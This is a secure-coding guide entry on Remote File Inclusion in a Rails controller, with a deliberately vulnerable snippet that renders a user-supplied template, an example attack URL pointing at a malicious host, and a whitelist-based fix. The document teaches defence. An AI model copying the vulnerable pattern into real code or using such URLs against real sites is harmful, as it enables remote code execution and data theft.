Remote File Inclusion
Need
Prevention of remote file inclusion and execution
Context
- Usage of Ruby 2.5 for executing Ruby code and running Ruby applications
- Usage of Rails framework for building web applications
- Usage of ActiveRecord for Object-Relational Mapping (ORM) in database operations
Description
Non compliant code
class UserController < ApplicationController
def index
@user = User.find(params[:id])
render params[:template]
end
end
In the above code, we have a UserController with an index action that fetches a user from the database using an id passed in via params. After fetching the user, it renders a template also passed in via params.
The vulnerability here lies in the use of params[:template] in the render method. This allows an attacker to pass in a path to a malicious template that resides in a remote location. This is known as Remote File Inclusion (RFI).
For instance, an attacker could craft a URL such as http://yourwebsite.com/user/index?template=http://maliciouswebsite.com/malicious_template. When this URL is accessed, the application would fetch the malicious template from the remote server and render it, leading to potential data leakage or remote command execution.
Steps
- Sanitize user input: Validate and sanitize any user input before using it to render templates.
- Whitelist allowed templates: Create a whitelist of allowed templates and only render templates from this list.
- Avoid dynamic template rendering: Instead of allowing users to specify the template to render, use a fixed template or a limited set of predefined templates.
- Implement access controls: Ensure that only authorized users can access the UserController#index action.
- Keep the application and dependencies up to date: Regularly update the Ruby on Rails framework and its dependencies to benefit from security patches and fixes.
- Implement a Web Application Firewall (WAF): Use a WAF to detect and block attempts to exploit remote file inclusion vulnerabilities.
- Perform security testing: Regularly conduct security testing, such as penetration testing and code reviews, to identify and fix vulnerabilities.
Compliant code
class UserController < ApplicationController
before_action :authenticate_user!
TEMPLATE_WHITELIST = ['template1', 'template2', 'template3']
def index
@user = User.find(params[:id])
template = params[:template]
if TEMPLATE_WHITELIST.include?(template)
render template
else
render 'default_template'
end
end
end
The updated code includes several measures to mitigate the risk of Remote File Inclusion:
-
Sanitize user input: The
params[:template]is now checked against a whitelist of allowed templates (TEMPLATE_WHITELIST). If the provided template is not in the whitelist, a default template is rendered. This ensures that only valid templates can be rendered, preventing the inclusion of malicious files. -
Whitelist allowed templates: The
TEMPLATE_WHITELISTconstant is a list of allowed templates. This is a form of input validation that ensures only predefined templates can be rendered. -
Avoid dynamic template rendering: By checking the user-provided template against a whitelist, the application no longer allows arbitrary templates to be rendered. This reduces the attack surface for Remote File Inclusion.
-
Implement access controls: The
before_action :authenticate_user!ensures that only authenticated users can access theindexaction. This is a form of access control that can prevent unauthorized access to sensitive data.
Remember to keep your application and its dependencies up to date, implement a Web Application Firewall (WAF), and perform regular security testing to further enhance the security of your application.